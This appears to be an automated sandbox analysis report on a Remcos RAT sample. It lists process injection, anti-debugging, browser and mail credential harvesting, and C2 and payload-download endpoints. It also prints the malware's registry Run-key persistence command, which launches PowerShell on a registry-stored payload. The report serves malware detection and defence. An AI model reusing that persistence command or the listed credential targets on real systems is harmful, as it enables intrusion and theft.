Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | API coverage: 9.9 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4428 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe TID: 2520 | Thread sleep count: 1594 > 30
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe TID: 2520 | Thread sleep time: -4782000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe TID: 2520 | Thread sleep count: 8392 > 30
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe TID: 2520 | Thread sleep time: -25176000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Code function: 0_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Code function: 0_2_00402862 FindFirstFileW
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Code function: 0_2_0040658F FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_00402862 FindFirstFileW
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_0040658F FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_23BC10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_0040AE51 FindFirstFileW,FindNextFileW
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_00418981 memset,GetSystemInfo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\intercessionate\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: Conspect124.exe, 00000007.00000002.4164316421.0000000006EC8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW8
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | API call chain: ExitProcess graph end node graph_0-3874
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | API call chain: ExitProcess graph end node graph_0-3870
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

            Anti Debugging

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Thread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_02CFD8D0 LdrInitializeThunk,LdrInitializeThunk
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_23BC2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_23BC4AB4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_23BC724E GetProcessHeap
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_23BC2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_23BC2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_23BC60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Conspect124.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Conspect124.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Conspect124.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Users\user\AppData\Local\Temp\Conspect124.exe base: 1730000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Users\user\AppData\Local\Temp\Conspect124.exe base: 19FFF4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Conspect124.exe "C:\Users\user\AppData\Local\Temp\Conspect124.exe"
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Process created: C:\Users\user\AppData\Local\Temp\Conspect124.exe C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\llsemopjpzfqlbiqwdrulxfexi"
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Process created: C:\Users\user\AppData\Local\Temp\Conspect124.exe C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\vnfxngzclhxvohwunodvwkzvgosxx"
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Process created: C:\Users\user\AppData\Local\Temp\Conspect124.exe C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\fhlpgzkezppayvsywzqpzpmegvkgywqb"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%begunstigelses% -windowstyle minimized $hjtryksryg=(get-itemproperty -path 'hkcu:\forseglingens\').drenching;%begunstigelses% ($hjtryksryg)"
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%begunstigelses% -windowstyle minimized $hjtryksryg=(get-itemproperty -path 'hkcu:\forseglingens\').drenching;%begunstigelses% ($hjtryksryg)"
            Source: Conspect124.exe, 00000007.00000002.4164560260.0000000006F8C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
            Source: Conspect124.exe, 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
            Source: Conspect124.exe, 00000007.00000002.4164560260.0000000006F8C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerC=
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_23BC2933 cpuid
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_23BC2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Code function: 0_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4164316421.0000000006F06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: Conspect124.exe PID: 1800, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: ESMTPPassword | 12_2_004033F0
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword | 12_2_00402DB3
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword | 12_2_00402DB3

            Remote Access Functionality

            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-DSGECX
            Source: Yara match | File source: 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4164316421.0000000006F06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: Conspect124.exe PID: 1800, type: MEMORYSTR
            MITRE ATT&CK Matrix (one line per tactic; a number in front of a technique is the report's signature-count badge for that technique)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: 1 Windows Management Instrumentation; 11 Native API; 12 Command and Scripting Interpreter; 2 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            Persistence: 1 DLL Side-Loading; 1 Registry Run Keys / Startup Folder; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 212 Process Injection; 1 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Defense Evasion: 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading; 11 Masquerading; 1 Modify Registry; 131 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 212 Process Injection
            Credential Access: 1 OS Credential Dumping; 2 Credentials in Registry; 1 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: 1 System Time Discovery; 1 Account Discovery; 3 File and Directory Discovery; 129 System Information Discovery; 341 Security Software Discovery; 131 Virtualization/Sandbox Evasion; 4 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 2 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Command and Control: 1 Ingress Tool Transfer; 21 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 1518329 | Sample: SDWLLRJcsY.exe | Startdate: 25/09/2024 | Architecture: WINDOWS | Score: 100
            Contacted domains: geoplugin.net; cmgtrading.eu
            Top-level signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 4 other signatures

            Process tree (dropped files, network endpoints and signatures attached to each node):
            SDWLLRJcsY.exe (started)
                dropped: C:\Users\user\AppData\Roaming\...\Papyr.paa, ASCII
                signatures: Suspicious powershell command line found
                -> powershell.exe (started)
                    dropped: C:\Users\user\AppData\...\Conspect124.exe, PE32; C:\Users\...\Conspect124.exe:Zone.Identifier, ASCII
                    signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Hides threads from debuggers; Powershell drops PE file
                    -> conhost.exe (started)
                    -> Conspect124.exe (started)
                        network: 107.173.4.16, 2404, 64860, 64862, AS-COLOCROSSINGUS, United States; geoplugin.net 178.237.33.50, 64861, 80, ATOM86-ASATOM86NL, Netherlands; cmgtrading.eu 185.26.107.57, 443, 64858, 64859, ATE-ASFR, France
                        signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Detected Remcos RAT; 4 other signatures
                        -> Conspect124.exe (started): Tries to steal Instant Messenger accounts or passwords; Tries to harvest and steal browser information (history, passwords, etc)
                        -> Conspect124.exe (started): Tries to steal Mail credentials (via file / registry access)
                        -> Conspect124.exe (started)
                        -> cmd.exe (started)
                            -> conhost.exe (started)
                            -> reg.exe (started)

            Source | Detection | Scanner | Label | Link
            SDWLLRJcsY.exe | 13% | ReversingLabs
            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\Temp\Conspect124.exe | 13% | ReversingLabs
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
            http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
            https://contoso.com/License | 0% | URL Reputation | safe
            https://contoso.com/Icon | 0% | URL Reputation | safe
            http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
            http://geoplugin.net/json.gp | 0% | URL Reputation | safe
            https://aka.ms/pscore6lB | 0% | URL Reputation | safe
            https://contoso.com/ | 0% | URL Reputation | safe
            https://nuget.org/nuget.exe | 0% | URL Reputation | safe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
            http://geoplugin.net/json.gplH | 0% | Avira URL Cloud | safe
            http://geoplugin.net/json.gpd | 0% | Avira URL Cloud | safe
            http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe
            http://geoplugin.net/json.gpl | 0% | Avira URL Cloud | safe
            http://www.imvu.comr | 0% | Avira URL Cloud | safe
            http://www.imvu.com | 0% | Avira URL Cloud | safe
            https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
            http://geoplugin.net/json.gpy | 0% | Avira URL Cloud | safe
            http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe
            http://geoplugin.net/json.gp. | 0% | Avira URL Cloud | safe
            https://cmgtrading.eu/eODGqfP132.binC | 0% | Avira URL Cloud | safe
            http://geoplugin.net/json.gp5 | 0% | Avira URL Cloud | safe
            https://www.google.com | 0% | Avira URL Cloud | safe
            https://www.google.com/accounts/servicelogin | 0% | Avira URL Cloud | safe
            https://login.yahoo.com/config/login | 0% | Avira URL Cloud | safe
            http://www.nirsoft.net/ | 0% | Avira URL Cloud | safe
            http://www.ebuddy.com | 0% | Avira URL Cloud | safe
            https://cmgtrading.eu/eODGqfP132.bin | 100% | Avira URL Cloud | malware
            http://cmgtrading.eu/eODGqfP132.bin | 100% | Avira URL Cloud | malware
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            cmgtrading.eu | 185.26.107.57 | true | false | | unknown
            geoplugin.net | 178.237.33.50 | true | false | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
            https://cmgtrading.eu/eODGqfP132.bin | false | Avira URL Cloud: malware | unknown
            http://cmgtrading.eu/eODGqfP132.bin | false | Avira URL Cloud: malware | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            http://geoplugin.net/json.gpd | Conspect124.exe, 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://geoplugin.net/json.gplH | Conspect124.exe, 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.3170024111.00000000059C7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.imvu.comr | Conspect124.exe, 00000007.00000002.4177334416.0000000023B90000.00000040.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.3165842490.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://geoplugin.net/json.gpl | Conspect124.exe, 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.3165842490.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://geoplugin.net/json.gp. | Conspect124.exe, 00000007.00000002.4164316421.0000000006EC8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://contoso.com/License | powershell.exe, 00000001.00000002.3170024111.00000000059C7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.imvu.com | Conspect124.exe | false | Avira URL Cloud: safe | unknown
            https://contoso.com/Icon | powershell.exe, 00000001.00000002.3170024111.00000000059C7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://nsis.sf.net/NSIS_ErrorError | SDWLLRJcsY.exe, 00000000.00000000.1682153020.000000000040A000.00000008.00000001.01000000.00000003.sdmp, SDWLLRJcsY.exe, 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Conspect124.exe, 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp | false | URL Reputation: safe | unknown
            http://geoplugin.net/json.gp5 | Conspect124.exe, 00000007.00000002.4164316421.0000000006EC8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://geoplugin.net/json.gpy | Conspect124.exe, 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.3165842490.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | Conspect124.exe, 00000007.00000002.4177334416.0000000023B90000.00000040.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
